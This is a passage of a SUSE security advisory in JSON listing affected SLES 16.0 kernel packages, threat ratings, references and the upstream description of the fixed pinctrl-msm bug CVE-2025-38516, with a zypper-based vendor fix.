"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38515"
},
{
"cve": "CVE-2025-38516",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38516"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npinctrl: qcom: msm: mark certain pins as invalid for interrupts\n\nOn some platforms, the UFS-reset pin has no interrupt logic in TLMM but\nis nevertheless registered as a GPIO in the kernel. This enables the\nuser-space to trigger a BUG() in the pinctrl-msm driver by running, for\nexample: `gpiomon -c 0 113` on RB2.\n\nThe exact culprit is requesting pins whose intr_detection_width setting\nis not 1 or 2 for interrupts. This hits a BUG() in\nmsm_gpio_irq_set_type(). Potentially crashing the kernel due to an\ninvalid request from user-space is not optimal, so let\u0027s go through the\npins and mark those that would fail the check as invalid for the irq chip\nas we should not even register them as available irqs.\n\nThis function can be extended if we determine that there are more\ncorner-cases like this.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38516",
"url": "https://www.suse.com/security/cve/CVE-2025-38516"
},
{
"category": "external",
"summary": "SUSE Bug 1248209 for CVE-2025-38516",
"url": "https://bugzilla.suse.com/1248209"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
